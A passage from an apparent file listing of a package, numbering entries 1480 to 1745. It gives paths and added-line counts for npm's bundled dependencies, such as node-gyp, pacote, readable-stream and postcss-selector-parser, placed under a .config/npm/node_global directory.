  1480. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/pretty_gyp.py +156 -0
  1481. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/pretty_sln.py +181 -0
  1482. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/gyp/tools/pretty_vcproj.py +339 -0
  1483. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/Find-VisualStudio.cs +250 -0
  1484. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/build.js +213 -0
  1485. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/clean.js +15 -0
  1486. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/configure.js +360 -0
  1487. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/create-config-gypi.js +147 -0
  1488. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/find-node-directory.js +63 -0
  1489. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/find-python.js +344 -0
  1490. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/find-visualstudio.js +463 -0
  1491. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/install.js +458 -0
  1492. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/list.js +27 -0
  1493. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/node-gyp.js +215 -0
  1494. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/process-release.js +147 -0
  1495. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/rebuild.js +13 -0
  1496. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/remove.js +46 -0
  1497. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/lib/util.js +64 -0
  1498. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/macOS_Catalina.md +104 -0
  1499. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/macOS_Catalina_acid_test.sh +21 -0
  1500. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/abbrev/LICENSE +46 -0
  1501. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/abbrev/abbrev.js +61 -0
  1502. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/abbrev/package.json +21 -0
  1503. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/LICENSE.md +18 -0
  1504. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/lib/index.js +4 -0
  1505. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/lib/tracker-base.js +11 -0
  1506. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/lib/tracker-group.js +116 -0
  1507. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/lib/tracker-stream.js +36 -0
  1508. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/lib/tracker.js +32 -0
  1509. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/are-we-there-yet/package.json +56 -0
  1510. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/brace-expansion/LICENSE +21 -0
  1511. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/brace-expansion/index.js +201 -0
  1512. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/brace-expansion/package.json +47 -0
  1513. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/LICENSE.md +20 -0
  1514. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/base-theme.js +18 -0
  1515. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/error.js +24 -0
  1516. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/has-color.js +4 -0
  1517. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/index.js +289 -0
  1518. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/plumbing.js +50 -0
  1519. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/process.js +3 -0
  1520. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/progress-bar.js +41 -0
  1521. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/render-template.js +222 -0
  1522. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/set-immediate.js +7 -0
  1523. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/set-interval.js +3 -0
  1524. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/spin.js +5 -0
  1525. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/template-item.js +87 -0
  1526. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/theme-set.js +122 -0
  1527. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/themes.js +56 -0
  1528. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/lib/wide-truncate.js +31 -0
  1529. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/gauge/package.json +66 -0
  1530. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/glob/LICENSE +21 -0
  1531. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/glob/common.js +238 -0
  1532. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/glob/glob.js +790 -0
  1533. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/glob/package.json +55 -0
  1534. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/glob/sync.js +486 -0
  1535. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/minimatch/LICENSE +15 -0
  1536. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/minimatch/minimatch.js +947 -0
  1537. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/minimatch/package.json +33 -0
  1538. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/nopt/LICENSE +15 -0
  1539. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/nopt/README.md +213 -0
  1540. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/nopt/bin/nopt.js +56 -0
  1541. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/nopt/lib/nopt.js +515 -0
  1542. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/nopt/package.json +53 -0
  1543. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/npmlog/LICENSE.md +20 -0
  1544. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/npmlog/lib/log.js +404 -0
  1545. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/npmlog/package.json +51 -0
  1546. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/CONTRIBUTING.md +38 -0
  1547. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/GOVERNANCE.md +136 -0
  1548. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/LICENSE +47 -0
  1549. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/errors-browser.js +127 -0
  1550. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/errors.js +116 -0
  1551. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/experimentalWarning.js +17 -0
  1552. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/_stream_duplex.js +126 -0
  1553. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/_stream_passthrough.js +37 -0
  1554. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/_stream_readable.js +1027 -0
  1555. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/_stream_transform.js +190 -0
  1556. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/_stream_writable.js +641 -0
  1557. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/async_iterator.js +180 -0
  1558. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/buffer_list.js +183 -0
  1559. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/destroy.js +96 -0
  1560. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/end-of-stream.js +86 -0
  1561. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/from-browser.js +3 -0
  1562. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/from.js +52 -0
  1563. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/pipeline.js +86 -0
  1564. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/state.js +22 -0
  1565. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/stream-browser.js +1 -0
  1566. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/lib/internal/streams/stream.js +1 -0
  1567. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/package.json +68 -0
  1568. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/readable-browser.js +9 -0
  1569. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/readable-stream/readable.js +16 -0
  1570. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/signal-exit/LICENSE.txt +16 -0
  1571. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/signal-exit/index.js +202 -0
  1572. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/signal-exit/package.json +38 -0
  1573. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/signal-exit/signals.js +53 -0
  1574. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/which/LICENSE +15 -0
  1575. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/which/README.md +54 -0
  1576. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/which/bin/node-which +52 -0
  1577. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/which/package.json +43 -0
  1578. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/node_modules/which/which.js +125 -0
  1579. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/package.json +51 -0
  1580. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/src/win_delay_load_hook.cc +39 -0
  1581. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/common.js +3 -0
  1582. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2017_BuildTools_minimal.txt +1 -0
  1583. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2017_Community_workload.txt +1 -0
  1584. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2017_Express.txt +1 -0
  1585. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2017_Unusable.txt +1 -0
  1586. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2019_BuildTools_minimal.txt +1 -0
  1587. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2019_Community_workload.txt +1 -0
  1588. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2019_Preview.txt +1 -0
  1589. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/VS_2022_Community_workload.txt +569 -0
  1590. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/certs.js +150 -0
  1591. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/nodedir/include/node/config.gypi +6 -0
  1592. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/fixtures/test-charmap.py +31 -0
  1593. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/process-exec-sync.js +140 -0
  1594. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/reporter.js +75 -0
  1595. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/simple-proxy.js +27 -0
  1596. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-addon.js +152 -0
  1597. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-configure-python.js +81 -0
  1598. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-create-config-gypi.js +61 -0
  1599. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-download.js +210 -0
  1600. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-find-accessible-sync.js +73 -0
  1601. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-find-node-directory.js +115 -0
  1602. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-find-python.js +213 -0
  1603. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-find-visualstudio.js +670 -0
  1604. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-install.js +137 -0
  1605. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-options.js +41 -0
  1606. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/test/test-process-release.js +401 -0
  1607. package/.config/npm/node_global/lib/node_modules/npm/node_modules/node-gyp/update-gyp.py +64 -0
  1608. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/LICENSE +15 -0
  1609. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/README.md +213 -0
  1610. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/bin/nopt.js +29 -0
  1611. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/lib/debug.js +4 -0
  1612. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/lib/nopt-lib.js +479 -0
  1613. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/lib/nopt.js +30 -0
  1614. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/lib/type-defs.js +91 -0
  1615. package/.config/npm/node_global/lib/node_modules/npm/node_modules/nopt/package.json +51 -0
  1616. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/LICENSE +15 -0
  1617. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/extract_description.js +24 -0
  1618. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/fixer.js +475 -0
  1619. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/make_warning.js +22 -0
  1620. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/normalize.js +48 -0
  1621. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/safe_format.js +11 -0
  1622. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/typos.json +25 -0
  1623. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/lib/warning_messages.json +30 -0
  1624. package/.config/npm/node_global/lib/node_modules/npm/node_modules/normalize-package-data/package.json +55 -0
  1625. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/LICENSE +16 -0
  1626. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/colors.js +22 -0
  1627. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/exit-code.js +14 -0
  1628. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/index.js +41 -0
  1629. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/reporters/detail.js +86 -0
  1630. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/reporters/install.js +75 -0
  1631. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/reporters/json.js +1 -0
  1632. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/lib/reporters/quiet.js +1 -0
  1633. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-audit-report/package.json +60 -0
  1634. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-bundled/LICENSE +15 -0
  1635. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-bundled/lib/index.js +254 -0
  1636. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-bundled/package.json +49 -0
  1637. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-install-checks/LICENSE +27 -0
  1638. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-install-checks/lib/index.js +99 -0
  1639. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-install-checks/package.json +51 -0
  1640. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-normalize-package-bin/LICENSE +15 -0
  1641. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-normalize-package-bin/lib/index.js +64 -0
  1642. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-normalize-package-bin/package.json +44 -0
  1643. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-package-arg/LICENSE +15 -0
  1644. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-package-arg/lib/npa.js +431 -0
  1645. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-package-arg/package.json +59 -0
  1646. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-packlist/LICENSE +15 -0
  1647. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-packlist/lib/index.js +457 -0
  1648. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-packlist/package.json +60 -0
  1649. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-pick-manifest/LICENSE.md +16 -0
  1650. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-pick-manifest/lib/index.js +218 -0
  1651. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-pick-manifest/package.json +56 -0
  1652. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-profile/LICENSE.md +20 -0
  1653. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-profile/lib/index.js +295 -0
  1654. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-profile/package.json +50 -0
  1655. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/LICENSE.md +20 -0
  1656. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/auth.js +145 -0
  1657. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/check-response.js +100 -0
  1658. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/clean-url.js +27 -0
  1659. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/default-opts.js +19 -0
  1660. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/errors.js +80 -0
  1661. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/index.js +247 -0
  1662. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-registry-fetch/package.json +67 -0
  1663. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-user-validate/LICENSE +27 -0
  1664. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-user-validate/lib/index.js +61 -0
  1665. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npm-user-validate/package.json +48 -0
  1666. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npmlog/LICENSE.md +20 -0
  1667. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npmlog/lib/log.js +400 -0
  1668. package/.config/npm/node_global/lib/node_modules/npm/node_modules/npmlog/package.json +52 -0
  1669. package/.config/npm/node_global/lib/node_modules/npm/node_modules/once/LICENSE +15 -0
  1670. package/.config/npm/node_global/lib/node_modules/npm/node_modules/once/once.js +42 -0
  1671. package/.config/npm/node_global/lib/node_modules/npm/node_modules/once/package.json +33 -0
  1672. package/.config/npm/node_global/lib/node_modules/npm/node_modules/p-map/index.js +81 -0
  1673. package/.config/npm/node_global/lib/node_modules/npm/node_modules/p-map/license +9 -0
  1674. package/.config/npm/node_global/lib/node_modules/npm/node_modules/p-map/package.json +53 -0
  1675. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/LICENSE +15 -0
  1676. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/README.md +285 -0
  1677. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/bin.js +158 -0
  1678. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/dir.js +108 -0
  1679. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/fetcher.js +505 -0
  1680. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/file.js +96 -0
  1681. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/git.js +327 -0
  1682. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/index.js +23 -0
  1683. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/registry.js +344 -0
  1684. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/remote.js +91 -0
  1685. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/util/add-git-sha.js +15 -0
  1686. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/util/cache-dir.js +15 -0
  1687. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/util/is-package-bin.js +25 -0
  1688. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/util/npm.js +14 -0
  1689. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/util/tar-create-options.js +31 -0
  1690. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/lib/util/trailing-slashes.js +10 -0
  1691. package/.config/npm/node_global/lib/node_modules/npm/node_modules/pacote/package.json +79 -0
  1692. package/.config/npm/node_global/lib/node_modules/npm/node_modules/parse-conflict-json/LICENSE.md +20 -0
  1693. package/.config/npm/node_global/lib/node_modules/npm/node_modules/parse-conflict-json/lib/index.js +104 -0
  1694. package/.config/npm/node_global/lib/node_modules/npm/node_modules/parse-conflict-json/package.json +49 -0
  1695. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-is-absolute/index.js +20 -0
  1696. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-is-absolute/license +21 -0
  1697. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-is-absolute/package.json +43 -0
  1698. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-key/index.js +16 -0
  1699. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-key/license +9 -0
  1700. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-key/package.json +39 -0
  1701. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/LICENSE.md +55 -0
  1702. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/dist/cjs/index.js +1995 -0
  1703. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/dist/cjs/package.json +3 -0
  1704. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/dist/mjs/index.js +1960 -0
  1705. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/dist/mjs/package.json +3 -0
  1706. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/LICENSE +15 -0
  1707. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/dist/cjs/index.js +1395 -0
  1708. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/dist/cjs/index.min.js +2 -0
  1709. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/dist/cjs/package.json +3 -0
  1710. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/dist/mjs/index.js +1391 -0
  1711. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/dist/mjs/index.min.js +2 -0
  1712. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/dist/mjs/package.json +3 -0
  1713. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/node_modules/lru-cache/package.json +109 -0
  1714. package/.config/npm/node_global/lib/node_modules/npm/node_modules/path-scurry/package.json +87 -0
  1715. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/API.md +872 -0
  1716. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/LICENSE-MIT +22 -0
  1717. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/index.js +17 -0
  1718. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/parser.js +1012 -0
  1719. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/processor.js +170 -0
  1720. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/attribute.js +448 -0
  1721. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/className.js +50 -0
  1722. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/combinator.js +21 -0
  1723. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/comment.js +21 -0
  1724. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/constructors.js +65 -0
  1725. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/container.js +308 -0
  1726. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/guards.js +58 -0
  1727. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/id.js +25 -0
  1728. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/index.js +21 -0
  1729. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/namespace.js +80 -0
  1730. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/nesting.js +22 -0
  1731. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/node.js +192 -0
  1732. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/pseudo.js +26 -0
  1733. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/root.js +44 -0
  1734. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/selector.js +21 -0
  1735. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/string.js +21 -0
  1736. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/tag.js +21 -0
  1737. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/types.js +28 -0
  1738. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/selectors/universal.js +22 -0
  1739. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/sortAscending.js +11 -0
  1740. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/tokenTypes.js +70 -0
  1741. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/tokenize.js +239 -0
  1742. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/util/ensureObject.js +17 -0
  1743. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/util/getProp.js +18 -0
  1744. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/util/index.js +13 -0
  1745. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/util/stripComments.js +21 -0
